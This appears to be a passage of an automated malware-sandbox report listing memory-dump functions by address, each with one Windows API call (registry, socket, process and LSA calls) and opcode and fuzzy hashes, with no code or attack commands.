Opcode ID: df00f0d15d03feb5a8f653f85851270ce6d619f1d9a3c1d144c1acfbb5e2f710
Instruction ID: e75d4624ef60daa560358af422cf47a3df564c2c1133fcde511d4c02cb9c11a9
Opcode Fuzzy Hash: df00f0d15d03feb5a8f653f85851270ce6d619f1d9a3c1d144c1acfbb5e2f710
Instruction Fuzzy Hash: A6317EB1505780AFEB22CF25DD44B62BFE8EF06314F08849AE9858B252D775E909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04CE5192, Relevance: 1.6, APIs: 1, Instructions: 97processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,00000E2C), ref: 04CE525C

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 5a3e732967009dfa3ec56564a44ea9f6bb292a37498cf97a0d57514532b07af3
Instruction ID: f19f464ea6df919f522539807b8a43a92f83b15143ffa260d3f78975012f6cee
Opcode Fuzzy Hash: 5a3e732967009dfa3ec56564a44ea9f6bb292a37498cf97a0d57514532b07af3
Instruction Fuzzy Hash: AB318D71200305AFEB31CF66CC81FA6BBEDEF08710F14895AEA458A591D771F605CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CBAB26, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 00CBABD5

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 9637390f4a1816da7a6279c17e637c493617cc2d6bc50ecd9174c79c19ff2b5f
Instruction ID: f5af43854fd722caa4df135e629fc986dcc30769545589e31a3666c42ba28a18
Opcode Fuzzy Hash: 9637390f4a1816da7a6279c17e637c493617cc2d6bc50ecd9174c79c19ff2b5f
Instruction Fuzzy Hash: 9531A2B25443846FE7228F65CC45FA7BFECEF05720F0884AAED809B152D264E949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04CE388A, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 04CE3936

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 327b28b7a4d0953d3c810ff238e8bc4b6eabf1830dafb6e7f426a7a6dc37d75a
Instruction ID: 297dff874f1ae24062314d7b66d95060421ae99d10bcfc759d27e6b276faa202
Opcode Fuzzy Hash: 327b28b7a4d0953d3c810ff238e8bc4b6eabf1830dafb6e7f426a7a6dc37d75a
Instruction Fuzzy Hash: 133171B15097846FE7228F65DC45F66BFB8EF06320F18849AED849B163D324A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 04CE310E, Relevance: 1.6, APIs: 1, Instructions: 90COMMON

Download Yara Rule

APIs

getnameinfo.WS2_32(?,00000E2C), ref: 04CE31A5

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: getnameinfo
String ID:
API String ID: 1866240144-0
Opcode ID: 4c9f6c30a09e7df854e36f8dfab7001a2aed11bb2ad19fb0b64f99f13686af8a
Instruction ID: daec3662d02fae359d1ef6cf7177418ad0ca96859c29d15ec2711864410168cf
Opcode Fuzzy Hash: 4c9f6c30a09e7df854e36f8dfab7001a2aed11bb2ad19fb0b64f99f13686af8a
Instruction Fuzzy Hash: 14217FB2500244AEE721DF6ACC45FAABBACEF04310F04896EEA858B551D765E544CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04CE1109, Relevance: 1.6, APIs: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

accept.WS2_32(?,?), ref: 04CE11AD

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: accept
String ID:
API String ID: 3005279540-0
Opcode ID: 196c0bc0b772e6c8628cbcf5b3d72fda136e335f55a8e28316ed6c941dac04f9
Instruction ID: 1387cbd486f49805d7861ab060da3cf8f182b80df859534071706fc85ca5204e
Opcode Fuzzy Hash: 196c0bc0b772e6c8628cbcf5b3d72fda136e335f55a8e28316ed6c941dac04f9
Instruction Fuzzy Hash: 26318FB5509780AFE722CB25DC45B66FFB8EF06314F08849AE9848B253D375A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CBAC1D, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 00CBACD8

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: d3981972b60cbe26ea24d85f3ec2faf870b1462330d0bf8774a7d582986f0f83
Instruction ID: 96881dda3147f1821bc43cd51ce52654aa9d302f80f883207e1af7fbbe057280
Opcode Fuzzy Hash: d3981972b60cbe26ea24d85f3ec2faf870b1462330d0bf8774a7d582986f0f83
Instruction Fuzzy Hash: 4E31B1711087846FE722CF21CC44FA2BFFCEF06320F08849AE9858B153D260E948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04CE0C18, Relevance: 1.6, APIs: 1, Instructions: 89timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE0CB5

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 56b871bc6ac177c973897d2fe2e393b5930c946874eb7c2f4597347f597b69bf
Instruction ID: e517bcfd1cc01d301f40d6d89d94a5d6c72282e25f031163fff3cbeceb5e75b7
Opcode Fuzzy Hash: 56b871bc6ac177c973897d2fe2e393b5930c946874eb7c2f4597347f597b69bf
Instruction Fuzzy Hash: 0C31A7B25093806FE7228F65DC45FA6BFB8EF06320F08849AE985DB153D365E505CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04CE52B2, Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 04CE533E

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: b22c23b99cd8e9a2c258b2eeb9755e97c29e13877b769258ecf7369664de6e82
Instruction ID: 21f28aff3eb53c7651a89acf7f318d3e243124d5f14bfbc39dfeca1b5de32f27
Opcode Fuzzy Hash: b22c23b99cd8e9a2c258b2eeb9755e97c29e13877b769258ecf7369664de6e82
Instruction Fuzzy Hash: 3C316EB25093C05FD712CF659C55AA2BFE4AF02224F1C84EEE884CF163D265A545C722

Uniqueness

Uniqueness Score: -1.00%

Function 04CE05CC, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 04CE067E

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 751629871ad9f9d17896f8715b80683c436612cc171231c4a3fb8a592e5248d1
Instruction ID: e992304e7c5d805df157ff52a2f19bcacdb869691e132d1ed470c2c357a337ea
Opcode Fuzzy Hash: 751629871ad9f9d17896f8715b80683c436612cc171231c4a3fb8a592e5248d1
Instruction Fuzzy Hash: AC31A4B2405780AFE722CF55DC45F56FFF8EF06320F04859AE9849B162D375A509CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CBAFCF, Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 00CBB06C

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: cf3a62b96513fb14ec17b760162f9245e5db86111afaa037faa3ed54ba4ded76
Instruction ID: 9b9d8795416183b55868884b9a9f83a6937ef517f15419824088c491776b5258
Opcode Fuzzy Hash: cf3a62b96513fb14ec17b760162f9245e5db86111afaa037faa3ed54ba4ded76
Instruction Fuzzy Hash: 6B3180B11093846FD722CB659C45F97BFB8EF06320F0884ABE9859B153D264A908CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00CBB2F3, Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

LsaOpenPolicy.ADVAPI32(?,00000E2C), ref: 00CBB38F

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: OpenPolicy
String ID:
API String ID: 2030686058-0
Opcode ID: 6cbacf4f5f7c00ab481585f5d8cbb0e101c9005cd7972f876d73d774af9c973d
Instruction ID: e1514cfbbc5c9c48724f6a71aed9945ae1e9f28fbb38b8b3934fc39bf2285d49
Opcode Fuzzy Hash: 6cbacf4f5f7c00ab481585f5d8cbb0e101c9005cd7972f876d73d774af9c973d
Instruction Fuzzy Hash: 2C217172504344AFE721CF65DC85FAABFF8EF05310F18889AED849B152D364E949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04CE0959, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 04CE09F9

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 1df6ac3c629fb405db447d217a212268044d29112498d4681aff26da72e587e0
Instruction ID: 3b438931fda5111aa03a2fbc2316df4c3b04884ad66dd0146bed85a61424fce4
Opcode Fuzzy Hash: 1df6ac3c629fb405db447d217a212268044d29112498d4681aff26da72e587e0
Instruction Fuzzy Hash: AA3184B1509780AFE722CF65CC45B66FFF8EF05310F0884AAE9849B292D375E904CB65

Uniqueness

Uniqueness Score: -1.00%

Function 04CE3C22, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E2C), ref: 04CE3CC7

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: e39d5abc2bade2ddd69f545b6bcde7b3d3c3bad1b64e52506c739d0dce9f3d1b
Instruction ID: 5a46b67f8a277cbc4ad161dc080982ad2b770586d663827e29005d395e77a373
Opcode Fuzzy Hash: e39d5abc2bade2ddd69f545b6bcde7b3d3c3bad1b64e52506c739d0dce9f3d1b
Instruction Fuzzy Hash: 6821ADB1100304AFEB319F66CC85FAAFBACEF04720F14885AEE459B181E274F5058BB1

Uniqueness

Uniqueness Score: -1.00%

Function 04CE359C, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNELBASE(?,00000E2C), ref: 04CE3635

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: 6f82c12a15aa065108f1a3d8600b7beebb35d426a0aa8d9e1387c0d0a5666202
Instruction ID: a886ade57cea6e94e29e11a0f5892d9c31d30201f0cae2493c7f0debb957eefa
Opcode Fuzzy Hash: 6f82c12a15aa065108f1a3d8600b7beebb35d426a0aa8d9e1387c0d0a5666202
Instruction Fuzzy Hash: 7021B4B14093846FEB128B25DC45F66BFB8EF06310F09849BED849F153D264A509CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA120, Relevance: 1.6, APIs: 1, Instructions: 82networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E2C,?,?), ref: 00CBA1C2

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: fbeb4c921e146b2b8e617139a71fbe3025aab649c738eda8259d481a90fb9124
Instruction ID: 7051836a3b5e60fc3820e695ed5698bfa7f87f2613540667df0f49f688c88143
Opcode Fuzzy Hash: fbeb4c921e146b2b8e617139a71fbe3025aab649c738eda8259d481a90fb9124
Instruction Fuzzy Hash: F221A07140D3C06FD7128B758C51A66BFB4EF47620F1985DBD8848F193D225A90ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 04CE2EED, Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE2F85

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 2094f74512e7e97f94c1b6184abf4f6f41829e1240b6d7c462687c391a8859a2
Instruction ID: 5f49218dad35abe5c601d75a623b234b6dee76e372c2f30e2eb541f5af06455d
Opcode Fuzzy Hash: 2094f74512e7e97f94c1b6184abf4f6f41829e1240b6d7c462687c391a8859a2
Instruction Fuzzy Hash: 552182710093806FDB228F258C55FA6FFB8EF06320F1885DBE9859F153C364A508CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04CE0006, Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE0091

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 190b028ce0383248a1e7597335a95bcb6b4dff330618071047a09ad345bafe7e
Instruction ID: 97e0e65ae2b7f0526ee1c2209e545d426034b276d93d64c18fa3bf6798725899
Opcode Fuzzy Hash: 190b028ce0383248a1e7597335a95bcb6b4dff330618071047a09ad345bafe7e
Instruction Fuzzy Hash: E421A4B24093806FE7228F65DC45F66BFB8EF46324F08849BE9849B153C265A509CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04CE121B, Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE12AA

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 4f60b3f2bd16bb0dec4ab3dd3ae9075a2df85528defb651b37662b42a03d76fb
Instruction ID: 2052f5dbb93bd8af1359dcf2769e488444e498e6aba1ef2006f1ef97b4263eba
Opcode Fuzzy Hash: 4f60b3f2bd16bb0dec4ab3dd3ae9075a2df85528defb651b37662b42a03d76fb
Instruction Fuzzy Hash: E4217FB24093846FD7228F659C44FA6BFB8EF46220F1884ABE984DB153D224A508CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04CE36C2, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 04CE3741

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: bd2dc838b55969a6e75150974b5d8f27da56c5b8a9d485a2b99312c444bcb02e
Instruction ID: c8d83d99667fbe3215a4b91d2445474825cc11f015128c24dbeedad5dac6c39c
Opcode Fuzzy Hash: bd2dc838b55969a6e75150974b5d8f27da56c5b8a9d485a2b99312c444bcb02e
Instruction Fuzzy Hash: AF219DB2500344AEE7219F6ADD44FABBBACEF04320F14886AED449B155D734F5058BB1

Uniqueness

Uniqueness Score: -1.00%

Function 04CE04EA, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 04CE0575

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 224508643d694025a6f655e701080f99c23b5c04df45e20e135bb9fddbd2c868
Instruction ID: 3570521694a48af4682a043c08ccd0a1801684a582191eb60ab36e895ec3c014
Opcode Fuzzy Hash: 224508643d694025a6f655e701080f99c23b5c04df45e20e135bb9fddbd2c868
Instruction Fuzzy Hash: D92191B1509380AFE721CF65CC45F66FFE8EF05220F18849AE9858B252D375E544CB65

Uniqueness

Uniqueness Score: -1.00%

Function 04CE37AF, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNELBASE(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE3840

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: a8201d2fca229f9934be60c53b3f10ab8b2fa5a405e325f867374cf9084e7f44
Instruction ID: 6dfb0b055d019f6c9dbdbd9a4179fd69b32c3eb86758af38eb4bac5a715b1ed1
Opcode Fuzzy Hash: a8201d2fca229f9934be60c53b3f10ab8b2fa5a405e325f867374cf9084e7f44
Instruction Fuzzy Hash: DF217FB1409384AFD722CF65DC45F97BFB8EF05320F0888ABE9859B152D224E508CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CBBD00, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 00CBBD95

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 0a9a1a1e99c6c5b2dbfee4126807ee3c9faff220c36d3d3826663cb7cd82ab1f
Instruction ID: 7e8ee426cef33b1b060ad32ff54d7f298c7ce7f63f3761528d1ff7e2ed693fad
Opcode Fuzzy Hash: 0a9a1a1e99c6c5b2dbfee4126807ee3c9faff220c36d3d3826663cb7cd82ab1f
Instruction Fuzzy Hash: 4A21F5B64087806FE713CB25DC40BA2BFB8EF46720F1884DAE9849B157D264A909C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 00CBB82E, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 00CBB8BA

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 93d9c20a493292ed1d3d1ff60785c91d9679022a1be11072b225ab3dff879679
Instruction ID: 2585cfdb44a364a72c19d7684692751c471cd00c1d7a635cbc6086a537e5482c
Opcode Fuzzy Hash: 93d9c20a493292ed1d3d1ff60785c91d9679022a1be11072b225ab3dff879679
Instruction Fuzzy Hash: FE219E71408780AFE7228F65DC44F56FFB8EF05310F08849EE9858B252D375A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04CE34C3, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE355F

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: 729aba1e01180c3f9b792e46acc9ca434e1ea5ad298331d635a9b0dd1bd3d79c
Instruction ID: eee4e1a932733e2a1b09c6630cef3b876b5f7dfaa4dd864a232857c4fd4e9592
Opcode Fuzzy Hash: 729aba1e01180c3f9b792e46acc9ca434e1ea5ad298331d635a9b0dd1bd3d79c
Instruction Fuzzy Hash: 7B2180B54097C46FE7238B259C55BA2BFB8EF06324F1984DAE9848B163D224A908C761

Uniqueness

Uniqueness Score: -1.00%

Function 00CBBC2A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00CBBCA9

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 460239a609bd867c262defa1f5ee5d74bf70fce0e1014dc54c44e7626aeac2e3
Instruction ID: d46becccd9ea7d608a8b95f02aae9f099a5fa040cd3620ad0d54162aebab1016
Opcode Fuzzy Hash: 460239a609bd867c262defa1f5ee5d74bf70fce0e1014dc54c44e7626aeac2e3
Instruction Fuzzy Hash: 78217C71500740AFEB21DF6ACD85BA6FFE8EF08320F14846AE9858B651D775E904CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04CE024E, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE02E0

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 53c9a1a1dd779dd36a64f9a54ffbf90ede05c347ac6964297291e38aea2dd02c
Instruction ID: 259a36f4d8fcb6aa8d6c0e66b977efe76fe5f2d7989b0f22b9e7f91080d1bc6f
Opcode Fuzzy Hash: 53c9a1a1dd779dd36a64f9a54ffbf90ede05c347ac6964297291e38aea2dd02c
Instruction Fuzzy Hash: AF219DB2505744AFD722CF56CC44F67BFF8EF05320F08849AE9859B252D364E508CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CBAB56, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 00CBABD5

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 07f060bba45e49751f12c134bad03bb723c4a746461bc7dbe97a783a80643164
Instruction ID: 0be6259e0a105930813e1db5a3d52a8d1f4104412df5e1ad534ae1f5aa09fb7e
Opcode Fuzzy Hash: 07f060bba45e49751f12c134bad03bb723c4a746461bc7dbe97a783a80643164
Instruction Fuzzy Hash: A4219FB2500704AFE7219F59CC85FAAFBECEF08720F14845AED819A241D634E5498AB2

Uniqueness

Uniqueness Score: -1.00%

Function 04CE443B, Relevance: 1.6, APIs: 1, Instructions: 74libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000E2C), ref: 04CE44DB

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2d27f00f176e3b69eaf08038d59f400284f1f889326f2fc8ad41288dd3f981c0
Instruction ID: be9885b513145a3d9f1756846e6369d20cbcc8ee597c73ae9307aac4fe259962
Opcode Fuzzy Hash: 2d27f00f176e3b69eaf08038d59f400284f1f889326f2fc8ad41288dd3f981c0
Instruction Fuzzy Hash: 9B21F8711493846FE722CB15CD45F66BFB8EF02320F1880DAE9845F193C268A949C775

Uniqueness

Uniqueness Score: -1.00%

Function 04CE0F5D, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE0FE3

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: getsockname
String ID:
API String ID: 3358416759-0
Opcode ID: 7f283d5681df69a00112f963ee7eea77239a4ec54437e1a410d3051ed2822e3e
Instruction ID: e74210a56ca01939f9a0f2dc8b7bc90a6fc6919f4a70e3a5fc65d73cc387960c
Opcode Fuzzy Hash: 7f283d5681df69a00112f963ee7eea77239a4ec54437e1a410d3051ed2822e3e
Instruction Fuzzy Hash: E92183B15093846FD722CF65DC45FA6BFA8EF45320F0884ABE9859B152D374E508CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04CE38C2, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 04CE3936

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 11016507b79ff605f7c6f6031b0121f83fb67457546192acf37a65b91b8c40de
Instruction ID: efc3c068cb7943fdb94c2f64159973fec607fdf202e6a5755d6f4999d79203ba
Opcode Fuzzy Hash: 11016507b79ff605f7c6f6031b0121f83fb67457546192acf37a65b91b8c40de
Instruction Fuzzy Hash: 8621AEB1500344AFEB219F5ADC45F7AFBA8EF04720F18886AEE859B652D334F505CA71

Uniqueness

Uniqueness Score: -1.00%

Function 00CBB31E, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

LsaOpenPolicy.ADVAPI32(?,00000E2C), ref: 00CBB38F

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: OpenPolicy
String ID:
API String ID: 2030686058-0
Opcode ID: 4b2f078fe79ccfe3099559451976abaa4a98d06679c19166b95227253084799c
Instruction ID: 5570264ebad75068760436fb44c50aff038b3aaa8a2fe31ddd39eaa1ba077739
Opcode Fuzzy Hash: 4b2f078fe79ccfe3099559451976abaa4a98d06679c19166b95227253084799c
Instruction Fuzzy Hash: 2621AE71500304AFEB20DF69DC85FAAFBE8EF04320F14886AED449A251D7B4E9058B71

Uniqueness

Uniqueness Score: -1.00%

Function 04CE33FE, Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE3479

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: c3fdc3218bdf7ed8bf5d91598c611d58226973e1f99ada76e2e699f5c1a1daa9
Instruction ID: 8baaa8ea694e4bd24ac0adeb4a232682e866fa9b4684fc604542f7b8a96eed81
Opcode Fuzzy Hash: c3fdc3218bdf7ed8bf5d91598c611d58226973e1f99ada76e2e699f5c1a1daa9
Instruction Fuzzy Hash: 8B213C71500744AFEB22CF56D884F66FBE8EF04720F18846AED458B666D734F508CA71

Uniqueness

Uniqueness Score: -1.00%

Function 04CE0986, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 04CE09F9

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: f36fad5423899c4ab2a072abcaa337f6efda8de0b38a1824761873ec291cfa92
Instruction ID: 2ccc3b7dbd838c10594aaf34fbb0c3e5c59e7486de9bf639f91acc7d3cfb1796
Opcode Fuzzy Hash: f36fad5423899c4ab2a072abcaa337f6efda8de0b38a1824761873ec291cfa92
Instruction Fuzzy Hash: 4D2183756003449FE720DF6ACC45B66FBE8EF04320F14846AED499B242D775F505CA75

Uniqueness

Uniqueness Score: -1.00%

Function 04CE1041, Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE10BF

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: a8315b7fd53c1e3561fb54cdb02868ba06280c67e827fc6a472557f85f2aa957
Instruction ID: 6c9aa9e5fe0f7c0eb3ceac053a34ecb4f23ec0d145e936f05db8d4601926b3bc
